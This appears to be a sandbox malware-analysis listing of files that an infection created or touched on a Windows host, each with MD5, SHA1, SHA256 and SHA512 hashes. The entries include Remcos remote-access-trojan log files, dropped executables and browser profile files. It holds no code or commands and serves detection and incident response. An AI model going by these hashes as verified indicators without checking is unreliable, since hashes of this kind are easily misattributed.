SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Roaming\NIebSjcCgFnY.exe

MD5 5d614c684e28b641cb1baa235b93a607
SHA1 897be2a7d89a460e785eb8d709fc5af5e063e489
SHA256 c5f256689f11369ee00414214fef56fb6eb22bb623835d676a02dfb561791200
SHA512 8ba03f06694bd7668f6c7cea090e00823927a66c99d8f06ce2b40f213a03420430f152e2f32e115d2266e12221d7b5b0448ab8eb25cc2b26a8f513f424c5ab96

C:\ProgramData\remcos\logs.dat

MD5 270861f193de870f3f0831b1883d46bc
SHA1 c3997a1b98da315cca57091944d231f855b36b93
SHA256 291bdcd5b7eac40ec216d4628dee6fc1da2a6fba210b159a4e213cf63694e93c
SHA512 76953e82d4ca1ec03014f68903f7141cf8cb3888105c5a0ea246e33d51907f92016257fbe6f9d7bd3aa6c5a3f7dfa36da1b83f97dfed0ce5b891423d7dcac47a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 116dc81b2e155b24b73420560878c311
SHA1 a9b49fabb60645d4775e5de6ee26fb937f7b4c88
SHA256 0ac74fb20e394b10f1a189a8c2669dc21013da282f5eb09e1ba989a085cec245
SHA512 30987a5e32eb76e510f0927dcd35570e84fe59e7c896e2fe0dc928fae1f2b3254cfce9907aa586d862bbb741aee838ee621752c62fc73da920e9c6ffda36eb5b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 34bd51a54343a5057e841035b4192a7e
SHA1 e9c282c355ed209131209385b8dcaed48ee7d233
SHA256 442d3ce65135959e73121917e6fedaef9390dd01404e2c29d6284e9ae2d4df7c
SHA512 aa3fcd248cf5f65a81e1a954fa20dd07f48985e7ab58d197217f08aa1c00d78c880531384e69369b161bd94bf1fdbc7e4b710e4bbcf5f51d5ec01dca9d9e09ea

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 faea25d2e8c6f4f75fb00397a2bf902f
SHA1 45f5658d724c14d9a7b30905ab38827225e0fa87
SHA256 51675f3dacc189d2582a29b70fd660fd64c7dea1e9f9c28f112505c2399ee601
SHA512 44de418c8a6ba02e2486b939001b533663a65b2de388ff579b9e80fd4d25af38117f690feeb3adaa4a5bc13130146f9d2ffafe12407d2b22cf4b39160a096eec

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 7afd9cf2f8f0f339f558f37d731fad65
SHA1 bfdbd18a698e09e85bff2a754263e026ea1da0b2
SHA256 f47dbbc2276cb7f0d72c171a64bf3c95fe79a057cca46261d5398a23eebc46b7
SHA512 62790c07a052702799e1799f5f0231ec69b3640df9cde0f03e4a47f0ed0de9aa4e1ca89848a0a14f5e56a0cec7349355ac8a6021acc006df088f5ea29f64343a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0585c1dd7fc2ac8d4a583b116b50f196
SHA1 dd0b1c48c444594605eafb460a138401ae2e9548
SHA256 43d958c6d01369f0922dba0eb97f4f0d5165662051dee39a78504f3ba778f400
SHA512 eeeaa24243812739d007ffa676973968059a0afa9185dc8433ded672ff206bd08b11667378728c80220d9982d81a0729a28be084871b641d3776e9bfbbbfbf9e

C:\ProgramData\remcos\logs.dat

MD5 d982aecb2cd47ee52d3b9c5f11349fda
SHA1 fd9ab0899c87003e5a536f4850916e6c976fea68
SHA256 78715dba97385f5b7aa2fbca13ed432d82ccea5dcaec62ceee9482293e5c140b
SHA512 2cce43c2d8565b318aef3eb759e0080f8fb497d72456b799062569427d13c5771c41c881fb99b3e7d647de869d128654a9969fc44b66b67f4f9bd6abe948fe67

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 37bba22a8163573fd0ccf43f5eb0b6c5
SHA1 c830f935ca77f5db4e1d8333a5d18d19e6f1c673
SHA256 4bbeda8396e4b40c79c4b38a6a9e4850acd04831aa5c239bd983088235caf4c2
SHA512 943183d59e07a26d65bd4dabb11020beaa48a65c89962f4890d044c517e12e7f31aa03193ecc78abcb9fa5acab3a3b720934af4632e37f5963cdc1667546bc03

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8da1a1af3d70ce0515b6bfd3b0307f44
SHA1 de25a142736f5c1c0e7b0ffc59621fa71c09e665
SHA256 e0e018b8ddcbd968abba02ae88e045cfe5859953c9a2bfdd00b6059593744401
SHA512 fdf4ac5fd8b83dcc47ceeacc5aefe854580a923fb5a6b59a657da58819a30d45b4dbaa12d7a77c62f3b9a187a2ce190ccf1d9e7fe69ab944e3e0402fef90cb75

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c0690460da732519fb2f851f638301ea
SHA1 7a3c4e4877e815822468b7030d165c4467dd491b
SHA256 e090b454301ff333268a2f1b5a0b7a5d766874fd2e084e349a2d525f2738937c
SHA512 73705c7175117a3b952659bb51827ec646e96b62ed9d0ec3406c0bb42e02248361391a7ffa11340b8931023a7dda8cb5e02ef05a0c63bf649077bbf42c706eed

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 ef6514d69380b59c73082c79a26bd27a
SHA1 c20c14980b412d1b68ec65098d262890bb56890c
SHA256 c6f96f237e982b72a962afebd4cce165a41f86c781b3963e8d217f5a4ad9158a
SHA512 e2b76de07cd83d5780fb74c3d599761c76871e0f0cc5762a2b369d30e9f7a24c12fd523b7a834a6fe82be73d2bb244184b134f9d090fde71ac1c049e61afb752

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 c672abe0b6c5d440122a3f276e99685b
SHA1 8f1016701f1cc5e617adc23ace360b8108bbe0a9
SHA256 9b41ca51971664bf73ce0f8d82234c1e2adf6891789722d2e84ed29d8e6901fb
SHA512 a9330fcf4f473a8498c6d817ffc15aa8474f44fad322c7fff57e4029392f35cf3a5c5b42b5a6f23d2ab0007cbc7df1c23df8033ce596fffb79ff42da430e1eaf

C:\ProgramData\remcos\logs.dat

MD5 f40450df4cfb72bd2b4b9b952ebb8c8d
SHA1 3b0b8966f0c437119e3bf3b7bf6e28a6dee9ce8b
SHA256 f228055aa20cd6bffe07fed706cbcc4d868f0772aa5394c5d2fcce2bb8c30220
SHA512 bf65a4fddf502dbb581a0523645360cd9c9f24700fc49ac19fca698cc38cdc5f9f13ba35e853a0435e293f25b6ab44ec1c45e002cfe9f9dbe2e88342e4aec4c4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 98c9921bff23cd9124be7db91de2be5e
SHA1 5a682d71ca8ec619fa72b65f6c85c5caa6f342dc
SHA256 8d46378e78e1af6bd17ec5b17f6c48faf651175817edde0c186222403fa0f730
SHA512 7f0fd21a24a16b483f2ce86b69b0f980367ac26218585fe99c662759079112ec6f901fd899500583753f63d4cc634c72a9a8957541e9b91599335c9f2a94e146

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 9ca1fca6ee5e78e0f0892a2982316a28
SHA1 2e545fc4135c78b964447b3c2284ee4fbcb79ba6
SHA256 c07a5919b0cc1a681ac2e54641943809ee44acb5fc2f791a0d5af0699bccb9bd
SHA512 246c02ec6b635da92541a3b33bff92e437c617a9119d0d9b19c7aed381597beea0026c06618f5b030bd1386e458796f60c066483ff6a0a20c8d155f581f26112

C:\Users\Admin\AppData\Local\Temp\DB1

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Roaming\N90OPR2B\N90logrv.ini

MD5 bbc41c78bae6c71e63cb544a6a284d94
SHA1 33f2c1d9fa0e9c99b80bc2500621e95af38b1f9a
SHA256 ee83c6bcea9353c74bfc0a7e739f3c4a765ace894470e09cdcdebba700b8d4cb
SHA512 0aea424b57adae3e14ad6491cab585f554b4dffe601b5a17bad6ee6177d2f0f995e419cde576e2d1782b9bddc0661aada11a2c9f1454ae625d9e3223635ec9f4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\bbc43d2f-b84f-43fb-ba4f-42d4194d6537.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Temp\Zibvxn\colorcplhhd0qj.exe

MD5 0cf1c234e21549b221bc4b2c81e28037
SHA1 06f7b2c8d262c7703ac8bbcc3038a6bbea1a4b67
SHA256 45ff6ee0df94a3cb333b709f521ca3818bc567bf34bfe7fd4533d3971789d539
SHA512 6c2423374598fcf7d782450363a2e871deb2909a436f0daafc193ff17ea3a4ab575b4bba73eed608416f62231cc28dcd953de07da6ad913707b52611ae98897c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

MD5 dcfea5506c4920646d7ffa54f4430d40
SHA1 5b2e5f1cc9e7ded2ab9f4bd97a4c8bcd98349845
SHA256 eada47de8bdd1ab6fa35083477bc118f0be2d3b2d87a67f41ef0e01a0977bd12
SHA512 b5702aaad7ad416eba9dd97cd7a399ee4f511cc1fbf6efb6f47a59a0854a9b56a92eba6749cf1dea1895e816e887826999e71fc6f1453c11043c1fff03de96ca

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 c9122f329bbcc9f7403c4003080f712f
SHA1 6aae415a7086ff49722fbe1bfd4d54327e90d8f4
SHA256 c7ea9f1bac05c4d87ed8f07c87ca5a4c285c84c632fc30a86dc44b4812f8ce86
SHA512 6b03f51063cc1efc0cce9b530f1a9d36e640f8a84ebca89fdc3cebc52499ff30aa788d49c4f9d3befc6d5c90b784e2dc0406e27887bfe744fdee2391cff1ba39

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 a761d6e55b338e8cfb6c5651edcfe56d
SHA1 eebbac9ef33ffb4e1df2e4d60d870d26896c196f
SHA256 2939cb5d0fec6759cb1955b6977b5e7077572e3f5080fd829500395eb1e56998
SHA512 719b8e220d219e4280ae172f4d4272afb2be04e80f5b1b91481c52a3ffd9bf37043c598fb4dee0df35228283a6c372f2eeffd1dde0dfed9c3d68855eaa6d7b27

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 1a4f822a5b6684aa54c3116d967abc06
SHA1 798031ae218c9b8e3687adaf83471afd39b18429
SHA256 421f720d9e00e393d100acb8127e4fc2494fc80501f944a6f466dd5745c7d3f6
SHA512 dd098a0eca0b2036b3132135b3f07f6005d38a01d52a7b25d65b5cc7e21a0b3cf5388a8ad111a4f3332cb220b1af7d60fb43bb0219b16426f36768362deb8495

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 8675cf6f5b51c2659ff178e8d5864710
SHA1 a999f96c112a915c01c44075511d5c07190e68df
SHA256 4ccea29d8cc1852ee4d7f6442f2c35480fe89f6fa057477650e6a6af5a1975f5
SHA512 839b0cac067fbb6d01ab5c1ead066227652fbfd2b5ba6eacee309e48e6e20dad26db625adc4a81bb3cc7d2993347bb12cc048c9cff0e61383e353ec38cb11bb3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 8ef4127a7c1e9dc4992f02e479268c14
SHA1 ec97b7e80e6aa7f2d337d312e84732aeb599cd59
SHA256 ce5badf61f761a0997ac2166f8378fe9795187394e39707951d685f756e14192
SHA512 dac70e6acd8c80c1a764dba582195080d3923206ce2de8284a8cf5280f7cc6156f3a748ea1efc37ab287dc332993f53b7f4989c25ca5305a41a4e2eaad8504b1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 3d35acdd04d1d90b7e2a866ef6f73d0f
SHA1 bf7ec29675f3c4063a50db71d9b7df6e5699f6fd
SHA256 4d51a8792dad1d23e19f1e4caf5188c69912351012a8ea15f12703c106bb5f0e
SHA512 ac1ed321efe3d11c8481e0c7877df43e5cc9cc0510e80d5893050191b70da387e6fecf5417833801feab9312885015aaeaa2a6650a17d8f145fb28e6cf64e781

C:\ProgramData\remcos\logs.dat

MD5 f94757b0f453a84be0646eff88b83702
SHA1 6886f0dc4df49cf2823c74af01891fa169635c2c
SHA256 224153108f336e8b291896f03cf244a870c08e2a28a62f9820a3dae021bd6618
SHA512 20dd94e2b619f86fc02859608361a4b252ee5a11b28517bd83e42b0d09cf76d00361bcec511b1d6d8ae48a2d172f5ba21d8808afe6af189c2cd7160ac2fb4ae6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 5c59c5525143ea3518e9ee116e922d64
SHA1 70e11b9f438f61bde08af34d38fe7a1297cc0130
SHA256 b42381c6d659c060d003b7d73d90cdd4424454285a1f6a74e0dfea912a89be83
SHA512 9573957f7383561cc0f0c63801225c54efb29c148ced9a40d367242a30a7985cbf4919fa3e49b1ff156b52f5b7b6f2fcd0ba8123329bebec261878f0dcf1551b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 367e7436ea30b05ad06941e5f9c5e951
SHA1 cb33d28c81917cfeba0aa3bf8e301a24c658f182
SHA256 6fe8f3418490883b6e27985559bb88f8cb6e7e50daab01498d6928d82f102c49
SHA512 8491398ff37ce7c14b39698b463d2f27cd698f281a51919526ede7e4c87af0c0a50c6902a1ae5e64c18d6243dd969cf8d0612f752b233a28e8eb900906545f94

C:\ProgramData\remcos\logs.dat

MD5 ad99059913b0e8eeb22f1af9e2adbb7c
SHA1 80f29a9c9ea82b18ec0074382278dab467100bab
SHA256 c582ac576e51806c2bd3e3dc3aacbad3041f46c56a15fcb73404bf0d75ff5ed3
SHA512 4c956e518d0118682d4d16f445e4abc4c2981b8f163ea470c10403cd928df210777cd815ad3f668045500b98115087877c688c879e8eb553c056fbeece7edbd6

C:\Users\Admin\AppData\Local\Temp\0a5e422e-e2c2-44fb-ba13-a7af99ab17ca.tmp

MD5 2a9208779e131bc39bc8b31f6e14e3f0
SHA1 9cfa608cf150c47fdc58bd7f3d9d82665b44564d
SHA256 921c292d54f1c0529ca6b3888249192c4bcafe54e3b667ca5da669b29015604a
SHA512 65167c811075a68049987b853ea701366b31d7a737b9b82be2f5c4936d1f83377b8081ec478946a8473abd0aa38518da0f543d24805052191dc012eac9f98104

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 6590dd652d15fe353433b1f90f0b36ad
SHA1 df895c7bcb28f6248ed68b3337b85321ff6fb781
SHA256 86ccc4b7919b32b2d5bb4d3a5201def7de41cdb0a77a72de0f70f68d46d34ee4
SHA512 017345e1227f2ec53a999be0ac3fab5165c054d540abe76c4a4e1877d1d8ebe3a804b987a0f366722abe8b40150ad245c21e31c5dab88236703eb1d20f458fa0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\204809db-cfde-466b-acbb-c035a009d5da.dmp

MD5 aaadb8737b2302da0e30ed890cfcadcb
SHA1 20b4989fd1298a1469a9ffcbb4806b5c3fc21689
SHA256 b2eadcd5a05971f4a07b1eaabeebfe184643fac097b399fae1d18c83439ebed5
SHA512 21a60d4ec6affc911b1bcdba628efa297e82d20abd630c4afcf4ccb3425420f3fb5cb31d86946e991eb4552a491f8a5b08fed86b6aa256b8964b50cdd2ca0f08

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 81b4ec23ff29d42ddaf413e787c58fa3
SHA1 667b6e1d1cca8803e98dcbcfacc47e77ce26b9cc
SHA256 2420ea1e70d2630c451a104356ed53c0f9bce49a49939b8922703821cf4d35ed
SHA512 a286f62a7a4ad460654112566e2b1651af7b613dae21a471d026d5dd3716347bc5b54e89c456f0ccf35858cc364679dc1d65708e2675af9e8e29cc0d4d8706f2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\95bcf356-c160-4dc4-aa78-1143c3ea8bac.tmp

MD5 c61d6b4c36b151379193a358aed10595
SHA1 4a757ababd401eb0c3f466333ec63ac8b2b52a5b
SHA256 08cb90d6855ee02abc0812b5b3c414c1623fea0381bc4be6af1ea13e3179a69f
SHA512 48cfcc3db1f71886227737dace4d4e66fe7810f098efbf9dc705e83ed439beb055de98578d352ee11c8063776934fdb4fe6aa61dd8f30c5fa6d579fdd018c9b0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 ab406bd1d38ef09099dcccceabbdfd26
SHA1 feb11b4ea5b1ea843b876644a2ed76cb396d34a8
SHA256 8842c5ea6b815693a57f0f49731d85366793d9b297fe467c8d9076dd268c54bd
SHA512 0d5cf2db54caa6eb1f7b75b6925959b8e29d6d143039a6e437ff64184de2ac62d37f524bd95634408278df95cc5c8521661eb698ee8fc340e9d9f6fbbd54b8bb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 35ec3756f03c27bcb9977b6b2e071334
SHA1 c8c058093e984c47977b7847a2d251b5ec52de8b
SHA256 40782649602909451371fdc7b8b98e87518969a8c540c7f454bf9666e2672d8e
SHA512 9f414438425145bab85dd53719941d71cd6ce741295ccc9ba38a8d96f96c03bf4e956d2c062fa25f6344dfd1322326cb626d5f7d8841c73c68857873ad3987ad

C:\ProgramData\remcos\logs.dat

MD5 4efda76fd4ed39938dcd465f8e6d54e0
SHA1 1cf7a843ec5eda6cd061d0ea85a675c2784b538c
SHA256 38112e8db1238a30c0edb2440397056291b3404c3b869a4be181b5892c3061f6
SHA512 442c07cf92d40aff838842170b64d5132c0e7f94e75c9701ed40d1405310e8e05fd0a69afcae02e8f7ff8917a9a7c9baf6b2bcd50eba97a240eab80ed0d69a42

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 b7dac16fa22cebfcb7011457c3478d10
SHA1 ecca696e10a7a97685c6014e561c0d0d3a3fc93f
SHA256 fa7b0fe59a9512ce841e6b8120d14f2641736e7a8d9fe9d8f0d7ebb6bd3c8a5e
SHA512 0feddb2ec049f117046bbccd5faffa6beef6f4b0e3002b739d4c4d098fe956ffc11e79a443248924b6c3108253010e26399021234cb02acad5d8d656e17644b0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

MD5 49c675e52f585f989e6a2979cd19d2f2
SHA1 87c889d43c52fc40bc10ed2ecbf201ef32b033df
SHA256 8adeb66a812c61f16c4d81e10137c5cdc65f0f4bb89f94d558e512b847fd8a96
SHA512 3a27b0cd4734b9d266f9f935f7c21db11a4557839a671f7d153cec656399fa9f72ee1e828cfc70fdd1b4e5ff8d82c2b449bfecb7e7db4af7b0e07bf8998ddb8d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

MD5 76a3f1e9a452564e0f8dce6c0ee111e8
SHA1 11c3d925cbc1a52d53584fd8606f8f713aa59114
SHA256 381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c
SHA512 a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

MD5 d6b36c7d4b06f140f860ddc91a4c659c
SHA1 ccf16571637b8d3e4c9423688c5bd06167bfb9e9
SHA256 34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92
SHA512 2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d

MD5 710d7637cc7e21b62fd3efe6aba1fd27
SHA1 8645d6b137064c7b38e10c736724e17787db6cf3
SHA256 c0997474b99524325dfedb5c020436e7ea9f9c9a1a759ed6daf7bdd4890bdc2b
SHA512 19aa77bed3c441228789cf8f931ca6194cc8d4bc7bb85d892faf5eaeda67d22c8c3b066f8ceda8169177da95a1fe111bd3436ceeaf4c784bd2bf96617f4d0c44

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e

MD5 d8588a7d7bb0b66fb439edf73ee37563
SHA1 a2398d543e3fbeb197e2128654bb5a1afd599585
SHA256 2210c60cbfec62e2bebd2c77783511100072459b3d0cc296216eab8e72d8af35
SHA512 7c87e7b4ec1d643ce2672ef9badefad6832c6fcc4053cedad2d34c52004aed4e0a589e2f839ace7bcdb0f409fff836ca7ce20dc882d9982568176d4b1c830bb9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010

MD5 fa645c95565140ec83f575428467aa02
SHA1 a06bf66c489c105c63e2791d5e9f01ee8f8188e6
SHA256 f5e4d2555f39de0f20ad80437796389da3deac8379e2dc9fde6df927cc53f525
SHA512 a728abfc13897cc92ed4761ebf59af9c9b9b45683c963f0265c7767d712151a60b10a11ab2085ff5bb3f8a5b0106dea0e3b5aea63ef5855cca4a39dd211956ad

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 aa3a423aca4c074a8225a4136cbd4a64
SHA1 f37423dfcfd1d1377290ed0a5df15ce19e8e1d01
SHA256 df486e89baef5495e7c46593dd0334da54e3d91d3be48de851f4acc66894c71c
SHA512 b70495ecccfa84e9da2833ce62a8ce69a3a29ace97139a39107290bf19f39282652341f55940eec4cf78c2134deb6fcc75fdfc627ee2f41134f8ed3c430b29dc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 039882e966ee4925e97547eded2efb6d
SHA1 334ba8d2cedf35367ca65fccd38e1db4c8c5a7c3
SHA256 256461a1cae29628d9aa2998cde31f8df959b4350e902516292fff05c3f88917
SHA512 7da2637802a969d5516a229f58e7cbdd7a76d272207cf6b805ce986a597080dd82734c4114cd327ca73fcf402c7de4c98d60ba7afd80e6a4d591b3ec491a440d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 1a50bb74a6e1c1c90b0746d79237bcb1
SHA1 200dc8e07a8e6f84c07a8bcd8121e420ddbad433
SHA256 6245601e2b0ca4d8c1d1d59cb57468bb304dea5ec82c07f7c13f2f68224e9f0b
SHA512 3e9024b35a70bf5048475b3130cb0ea1cbbbee8bbb1ab2038807a9687cba4ed46145b78d37db5059bf3bc9f3c3687b1656efac378161aa8024d5c843e4bd449d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\99b98054-249c-4ec3-bbdd-12cf48aa46ea.dmp

MD5 afe70c8b8d5ac3453121887a1d90ad2f
SHA1 dcb24672d3fc78b8243246ef2f4086545466dd13
SHA256 7d3ff777c432d1ed5d9186253cbca6b2b3a8bccb5d597c92946da5550f33cea5
SHA512 a660b424e5221e9ae001079088120f094d518affc38e25893b988e97254168ebce7b4b3dbaab8204a4a985d2bff82f0511e912b11ef212395a09851254dc6049

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

MD5 533a23f5a737926ee547857f53ba3e7d
SHA1 26600a689cc7867cf48d06aae799a8b25f6d440c
SHA256 6b458031c661836fd67f3f7a8c62f9c8824a754f86d84219cefb68bff90e2bcb
SHA512 6a95798e87e707834816ab59583bec194c604e61a0fc3d510f395ba7fe57e45917e8219d655c3058651c626018b333d607e592d1574e60984568a0afe4339b87

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\a3c192c6-b609-4ddc-981c-27d716e4eca6.tmp

MD5 78a6db13bef9fc02996c86a1d2dc2fd3
SHA1 4026f32ccd2dd744decc0e17ce40e51afc4397e3
SHA256 8bf039da6cdb169621280abc188f2a10cbf218ada11020491ba102538b3610c3
SHA512 f4ab22ab09e344781005bb86f8b0edb0bbdf23bb9df12cb3fbcc047395b023345ee45bba353dfee00565b09058a4318adb1564cd158a812395576db166670c4b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 2fb53631a68e8df75ab735c39103c21f
SHA1 9b8754b319a42aa7b370b6e0ed797ef32900e2de
SHA256 a445709218e9c6b99c1dace749270799af6a6e46a1450fc1c139a9d9db8e7799
SHA512 3d232d37131f7c4b0af36da3a2f4c209552ef790a2928db8c0e016b3ff6fc61bf64c2e387bb2a633d0d0a1006d4959aaaa2635feb6ab4074bc75c33ad6418d64

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\metadata

MD5 3cadf200903b4b0aff1383a6b1488e01
SHA1 b8a7de9cf097d3614bbdf7fb8341a50718e9f719
SHA256 808fe5d584f5d1cbff7d0934be41525ac7160266a5a5129460f3be26c4e1e8a2
SHA512 044030f57c41d889c9243fd8a62e85b514b0011ab12225013fe3cf9ee61d6a5631990cd78a17059813da208321c89c824ee6675c14a77d195ad355192738f081

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\d8d6f49e-9a73-49a3-9a31-47a458357541.dmp

MD5 ad97ce489da5e87e6fb82f8e12b65ff5
SHA1 eb756dc8b114d25c0ddc4c3fdffd1253770ce49b
SHA256 0f0caaa3d8670633f63afd47b6496742f560c37eb44d22422bce9a58cfa54a0b
SHA512 b7fe85d69fd2175234b341420a72917aeb523f3ee00f34b6b9a719a67fc623ee68791f007dd6f86e82dbab58b61fff24d86a0a7ed5dc8966dd4c98453e87ddce

C:\ProgramData\remcos\logs.dat

MD5 db043faab564a75466bdc394d7652057
SHA1 8afcc5f8611d7e46e71aa99bdc3a641e8dd867a0
SHA256 5c5de1fecc0ad84053eb7c2d5cbacc651dfdf265939959489062aa48d5b51029
SHA512 038ce64bc27eeb36c7be6596266dc0a281a3e0919369be02177b99f970051dc3eb896ad00b9f06f37f0b261c9c258e98060b0b060d4fce7f32c2d1ccaa77125c